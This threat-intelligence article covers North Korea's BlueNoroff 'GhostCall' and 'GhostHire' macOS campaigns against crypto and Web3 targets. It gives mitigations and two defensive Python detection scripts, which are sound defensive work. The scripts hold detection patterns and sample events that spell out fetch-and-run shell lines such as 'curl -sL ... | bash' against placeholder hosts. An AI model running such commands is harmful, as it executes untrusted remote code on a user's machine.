North Korea's BlueNoroff APT Targets macOS Users with New 'GhostCall' Malware

North Korean APT BlueNoroff Deploys New 'GhostCall' and 'GhostHire' Malware in Campaigns Targeting macOS Users in Crypto Sector

Severity: HIGH
October 28, 2025
5m read
Threat Actor, Malware, Phishing

Related Entities

Products & Tech: macOS, Zoom, Microsoft Teams, Telegram, GitHub

Full Report

Executive Summary

BlueNoroff (also known as APT38 or Sapphire Sleet), the financially motivated subgroup of North Korea's infamous Lazarus Group, has launched two new, highly sophisticated campaigns named 'GhostCall' and 'GhostHire'. Research from Kaspersky reveals these operations deploy a new arsenal of malware targeting macOS systems, a departure from the group's more frequent focus on Windows. The campaigns, active since at least April 2025, use elaborate social engineering lures—including fake job offers and investment opportunities enhanced with AI—to compromise executives in venture capital and developers in the Web3 and cryptocurrency industries. The ultimate goal is the theft of cryptocurrency assets.


Threat Overview

The two campaigns are part of BlueNoroff's broader 'SnatchCrypto' operation and demonstrate the group's increasing sophistication and focus on high-value targets in the financial and tech sectors.

  • GhostCall Campaign: Attackers pose as investors or entrepreneurs on Telegram and invite targets to a virtual meeting. They direct the victim to a convincing phishing page masquerading as a Zoom or Microsoft Teams website. During the fake call, which uses pre-recorded audio to appear legitimate, the attacker claims there is an audio issue and tricks the target into running a malicious script to 'fix' it. This script initiates a multi-stage infection.

  • GhostHire Campaign: This campaign targets Web3 developers with fake job offers. Attackers posing as recruiters convince the developer to download a malicious GitHub repository for a supposed skills assessment, which then deploys a payload tailored to the victim's operating system.

Kaspersky's investigation uncovered at least seven multi-stage execution chains and noted the attackers' use of AI to improve their productivity and refine their social engineering tactics.

Technical Analysis

BlueNoroff's new campaigns show a significant investment in developing malware for macOS, a platform often perceived as more secure.

  • Initial Access: The primary vector is highly targeted social engineering (T1566.002 - Spearphishing Link) delivered via platforms like Telegram.
  • Execution: The initial payload is often a malicious script downloaded from a fake meeting site or a GitHub repository.
  • Malware Suite: The infection chain deploys a suite of custom malware, including:
    • Keyloggers to capture passwords and other sensitive input.
    • A custom stealer designed to find and exfiltrate cryptocurrency wallet files, browser data, and session cookies.
    • Backdoors to provide persistent access to the compromised system.
  • Defense Evasion: The use of legitimate platforms like GitHub and convincing phishing sites for Zoom and Teams helps the attackers bypass initial suspicion. The multi-stage nature of the infection also helps to evade detection by deploying payloads piece by piece.

Impact Assessment

A successful compromise by BlueNoroff can lead to significant financial losses for both individuals and companies. By targeting venture capital executives and Web3 developers, the group aims to gain access to corporate or project treasuries containing large amounts of cryptocurrency. The impact includes:

  • Direct Financial Theft: Loss of cryptocurrency assets from personal or corporate wallets.
  • Intellectual Property Theft: Stealing proprietary code or investment strategies from Web3 projects and VC firms.
  • Reputational Damage: The association with a North Korean state-sponsored cyberattack can damage the reputation of the affected firms.

Victims have been identified in Japan, Italy, France, Singapore, Turkey, Spain, Sweden, India, Hong Kong, and Australia.

IOCs

No specific Indicators of Compromise (IOCs) were provided in the source articles.

Cyber Observables for Detection

  • file_name: Zoom.pkg or Teams.pkg from unofficial sources. An installer package for Zoom or Teams downloaded from a link provided in a chat, rather than from the official App Store or vendor website.
  • domain: Lookalike domains for zoom.us or teams.microsoft.com. Phishing domains designed to mimic legitimate meeting platforms.
  • process_name: Unsigned processes making network connections. On macOS, monitor for the execution of unsigned binaries that establish persistent network connections or access keychain data.
  • command_line_pattern: `curl -sL [URL] | bash`. A shell one-liner that pipes a downloaded script straight into an interpreter, so the script is executed without ever being saved to disk or inspected.

Detection & Response

  1. Endpoint Security for macOS: Deploy EDR solutions with strong macOS support to detect and block malicious scripts and unsigned binaries.
  2. User Awareness Training: Educate high-risk employees (executives, developers) about these specific social engineering tactics, including fake meeting invites and job offers on platforms like Telegram.
  3. Process Monitoring: On macOS, monitor for suspicious shell script execution, especially those that download additional files or attempt to escalate privileges.
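The observables listed above and the process-monitoring item in this section can be turned into a small triage check. The following Python script is an added example, not code from the article or from Kaspersky's research. It runs over a constructed list of process-execution events whose field names (pid, exe, cmdline, signed, net_conn) are an assumption rather than any vendor's schema, and the approved package directory is a hypothetical MDM staging path, not a real product location.

```python
import re
import shlex
from pathlib import PurePosixPath

# Shell one-liners that pipe a download straight into an interpreter, e.g.
# `curl -sL URL | bash` or `bash -c "$(curl URL)"`, the command-line
# observable named in the report.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:/bin/|/usr/bin/)?(?:ba|z|k)?sh\b"
    r"|\b(?:ba|z|k)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"
)

# Meeting-client installers are expected only from a managed distribution
# path. ASSUMPTION: a hypothetical MDM staging directory, not a real one.
APPROVED_PKG_DIRS = ("/Library/Managed Installs/",)
MEETING_CLIENT_NAMES = ("zoom", "teams")

# Constructed sample events in the shape an EDR or macOS Endpoint Security
# client export might take (field names are an assumption for this demo).
SAMPLE_EVENTS = [
    {"pid": 4101, "exe": "/bin/zsh", "signed": True, "net_conn": False,
     "cmdline": "zsh -c 'curl -sL https://zoom-audio-fix.invalid/fix.sh | bash'"},
    {"pid": 4102, "exe": "/usr/sbin/installer", "signed": True, "net_conn": False,
     "cmdline": "sudo installer -pkg /Users/alice/Downloads/Zoom.pkg -target /"},
    {"pid": 4103, "exe": "/usr/sbin/installer", "signed": True, "net_conn": False,
     "cmdline": "installer -pkg '/Library/Managed Installs/Zoom.pkg' -target /"},
    {"pid": 4104, "exe": "/Users/alice/Library/Caches/.update-helper", "signed": False,
     "net_conn": True, "cmdline": "/Users/alice/Library/Caches/.update-helper --daemon"},
    {"pid": 4105, "exe": "/usr/bin/curl", "signed": True, "net_conn": True,
     "cmdline": "curl -fsSL https://example.invalid/data.tar.gz -o /tmp/data.tar.gz"},
    {"pid": 4106, "exe": "/bin/bash", "signed": True, "net_conn": False,
     "cmdline": "bash -c \"$(curl -fsSL https://example.invalid/setup.sh)\""},
]


def is_pipe_to_shell(cmdline: str) -> bool:
    """True when a download is fed directly into a shell interpreter."""
    return PIPE_TO_SHELL.search(cmdline) is not None


def unofficial_meeting_pkgs(cmdline: str) -> list:
    """Return Zoom/Teams .pkg paths referenced outside APPROVED_PKG_DIRS."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to naive split
        tokens = cmdline.split()
    hits = []
    for tok in tokens:
        if not tok.lower().endswith(".pkg"):
            continue
        name = PurePosixPath(tok).name.lower()
        if not any(brand in name for brand in MEETING_CLIENT_NAMES):
            continue
        if not tok.startswith(APPROVED_PKG_DIRS):
            hits.append(tok)
    return hits


def scan_events(events) -> list:
    """Apply the three observable rules to each event; return findings."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        if is_pipe_to_shell(cmd):
            findings.append({"pid": ev["pid"], "rule": "pipe_to_shell", "detail": cmd})
        for pkg in unofficial_meeting_pkgs(cmd):
            findings.append({"pid": ev["pid"], "rule": "unofficial_meeting_pkg", "detail": pkg})
        # Unsigned binary with a network socket: needs signing and socket
        # data from the sensor, which this constructed sample supplies.
        if not ev["signed"] and ev["net_conn"]:
            findings.append({"pid": ev["pid"], "rule": "unsigned_network_process",
                             "detail": ev["exe"]})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"pid={f['pid']:<6} {f['rule']:<26} {f['detail']}")
```

Run it over an export from your EDR or a macOS Endpoint Security client after mapping its fields onto the event shape used here. The pipe-to-shell rule fires on the command line alone; the unsigned-network rule depends on the sensor supplying code-signing and socket data. A plain `curl -o` download (event 4105) is deliberately not an alert by itself, so pair it with a review of what happens to the downloaded file next, which is the behaviour the process-monitoring item above asks for.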

Mitigation

  1. Software Sourcing: Enforce strict policies requiring employees to download software only from official sources, such as the Apple App Store or verified vendor websites. Never install software from a link sent via chat.
  2. Scrutinize Communications: Be highly skeptical of unsolicited contact on platforms like Telegram, especially when it involves job offers or investment opportunities. Verify the identity of the person through separate, trusted channels.
  3. Hardware Wallets: For storing significant cryptocurrency assets, use hardware wallets that keep private keys offline and are immune to malware on the host computer.
  4. Limit Privileges: Operate on user accounts with standard, non-administrative privileges for daily tasks to limit the scope of what malware can do upon execution.

Timeline of Events

  1. April 1, 2025: The 'GhostCall' and 'GhostHire' campaigns are reported to have been active since at least this time.
  2. October 28, 2025: This article was published.

MITRE ATT&CK Mitigations

  • Educating high-risk users about sophisticated social engineering tactics is a critical first line of defense.
  • Use application control on macOS to prevent the execution of unsigned or unauthorized applications and scripts.
  • Deploy EDR and antivirus solutions capable of detecting malicious behavior on macOS endpoints.

D3FEND Defensive Countermeasures

Given the highly targeted social engineering nature of the 'GhostCall' and 'GhostHire' campaigns, User Behavior Analysis is a key defensive technique. Security teams should implement awareness programs specifically for executives and developers in the Web3/crypto space. This training must go beyond generic phishing and cover these exact TTPs: unsolicited Telegram messages, urgent requests for meetings, and fake job offers requiring skills tests from GitHub. Technically, organizations can monitor for anomalous behavior such as a developer cloning a GitHub repository that is not part of the organization's trusted projects or an executive downloading a meeting client from a non-standard URL. Alerting on these deviations from normal behavior can provide an early warning of a targeted attack.

To defend macOS endpoints from BlueNoroff's malware, organizations should move towards an Executable Allowlisting posture. Using macOS's built-in tools or a third-party EDR, create policies that only allow signed applications from the official App Store and identified, trusted developers to execute. This would prevent the malicious, unsigned scripts and applications downloaded from the fake Zoom/Teams pages or GitHub repos from running. For developers who need more flexibility, policies can be more permissive, but should still alert on the execution of any new, unsigned code, prompting a security review. This directly counters the attacker's execution phase by ensuring only vetted software can run on the endpoint.
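The two behavioral deviations named above, a meeting client fetched from a non-standard URL and a repository cloned from outside the organization's trusted projects, can be checked mechanically from proxy or endpoint telemetry. The Python below is an added example, not the article's or any product's code. The trusted GitHub organizations and the user activity records are constructed, and the official-origin table is limited to the two apex domains named in the report's observables.

```python
from typing import Optional
from urllib.parse import urlparse

# Official download origins for the two meeting clients impersonated in
# GhostCall. Subdomains of these apex domains count as official.
OFFICIAL_APEX = {
    "zoom": ("zoom.us",),
    "teams": ("microsoft.com",),
}

# ASSUMPTION: GitHub organizations a hypothetical company treats as trusted
# sources for internal projects and take-home assessments.
TRUSTED_GITHUB_ORGS = {"example-corp", "example-corp-labs"}

# Constructed activity records (user, action, url) for the demo.
SAMPLE_EVENTS = [
    {"user": "bob", "action": "download_meeting_client",
     "url": "https://zoom.us/client/latest/Zoom.pkg"},
    {"user": "bob", "action": "download_meeting_client",
     "url": "https://zoom-us-meeting.invalid/Zoom.pkg"},
    {"user": "bob", "action": "download_meeting_client",
     "url": "https://zoon.us/download/Zoom.pkg"},
    {"user": "alice", "action": "git_clone",
     "url": "https://github.com/example-corp/backend"},
    {"user": "alice", "action": "git_clone",
     "url": "git@github.com:rando-recruiter/skills-test.git"},
    {"user": "alice", "action": "download_meeting_client",
     "url": "https://teams.microsoft.com/downloads"},
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character typosquats of an apex."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Crude two-label approximation of the registrable domain (no PSL)."""
    return ".".join(host.split(".")[-2:])


def classify_meeting_url(url: str) -> str:
    """'official', 'lookalike' (brand string or 1-edit typosquat) or 'other'."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    if not host:
        return "other"
    for apexes in OFFICIAL_APEX.values():
        if any(host == apex or host.endswith("." + apex) for apex in apexes):
            return "official"
    reg = registrable(host)
    for brand, apexes in OFFICIAL_APEX.items():
        if brand in host or any(levenshtein(reg, apex) <= 1 for apex in apexes):
            return "lookalike"
    return "other"


def github_org(url: str) -> Optional[str]:
    """Extract the org from https://github.com/org/repo or git@github.com:org/repo."""
    if url.startswith("git@github.com:"):
        path = url[len("git@github.com:"):]
    else:
        parsed = urlparse(url)
        if (parsed.hostname or "").lower() != "github.com":
            return None
        path = parsed.path.lstrip("/")
    first = path.split("/")[0]
    return first.lower() or None


def is_trusted_clone(url: str, trusted_orgs=TRUSTED_GITHUB_ORGS) -> bool:
    org = github_org(url)
    return org is not None and org in trusted_orgs


def review_events(events, trusted_orgs=TRUSTED_GITHUB_ORGS) -> list:
    """Return (user, reason) alerts for the two deviations the report names."""
    alerts = []
    for ev in events:
        if ev["action"] == "download_meeting_client":
            verdict = classify_meeting_url(ev["url"])
            if verdict != "official":
                alerts.append((ev["user"], f"meeting client from {verdict} host: {ev['url']}"))
        elif ev["action"] == "git_clone" and not is_trusted_clone(ev["url"], trusted_orgs):
            alerts.append((ev["user"], f"clone from untrusted origin: {ev['url']}"))
    return alerts


if __name__ == "__main__":
    for user, reason in review_events(SAMPLE_EVENTS):
        print(f"{user}: {reason}")
```

classify_meeting_url deliberately treats any host that merely contains a brand string, or sits one edit away from the official apex, as a lookalike. That will produce false positives on unrelated domains, which is an acceptable trade-off for a population of executives who should only ever fetch the client from the vendor. The registrable-domain helper is a two-label approximation; a production version would use the public suffix list, and the allowlisting posture described above would still be the control that stops execution when such an alert is missed.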

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

BlueNoroff, APT38, Lazarus Group, macOS, Malware, Cryptocurrency, Social Engineering, Kaspersky
